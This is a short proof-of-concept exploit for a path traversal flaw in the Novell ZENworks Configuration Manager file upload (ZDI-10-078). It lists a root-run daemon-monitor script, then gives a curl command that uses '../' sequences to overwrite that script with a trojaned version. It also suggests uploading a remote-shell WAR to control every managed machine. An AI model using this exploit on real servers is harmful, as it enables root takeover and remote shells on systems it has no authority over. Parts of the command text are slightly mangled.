PoC for vulnerability discovered by Stephen Fewer (www.harmonysecurity.com)
http://www.zerodayinitiative.com/advisories/ZDI-10-078/
You can overwrite any file owned by zenworks user (nearly all /opt/novell)
such as /opt/novell/zenworks/bin/daemon-monitor that is a shell script
executed by NovellZENworks Daemon Monitor (/etc/init.d/novell-zenmntr) and
"of course" running as root…
$ ls -l /opt/novell/zenworks/bin/daemon-monitor
-rw-rw-r-- 1 zenworkszenworks 554 XXXX-YY-ZZ 69:69 /opt/novell/zenworks/bin/daemon-monitor
$ cat /opt/novell/zenworks/bin/daemon-monitor
SERVICES=`awk -F= '{ if ($1 == # "services") print $2}' /etc/opt/novell/zenworks/monitor.conf`
SLEEPTIME=`awk -F= '{ if ($1 == "sleep") print $2}' /etc/opt/novell/zenworks/monitor.conf`
echo $SERVICES
echo $SLEEPTIME
if [ -z "$SERVICES" ]; then
echo "No services defined in /etc/opt/novell/zenworks/monitor.conf"
exit 1
fi
if [ -z "$SLEEPTIME" ]; then
SLEEPTIME=10
fi
while [ 1 ]; do
sleep $SLEEPTIME
for SRV in $SERVICES; do
/etc/init.d/$SRV status >/dev/null 2>&1 || /etc/init.d/$SRV start
( date ; id ) >> /tmp/monitor.log 2>&1
done
done
$
You can change /opt/novell/zenworks/bin/jsvc (Java Virtual Machine), upload
a new remoteshell.war on /opt/novell/zenworks/share/tomcat/webapps or use
imagination to take control of all machines configured in ZCM.
PoC: Upload your own daemon-monitor (./daemon-monitor.troyanizado):
$ curl -ivkl 'http://zcm.server/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true'
–data-binary @./daemon-monitor.troyanizado -H "Content-Type: application/octet-stream"
<
–
Saludosde #linux, tu canal amigo.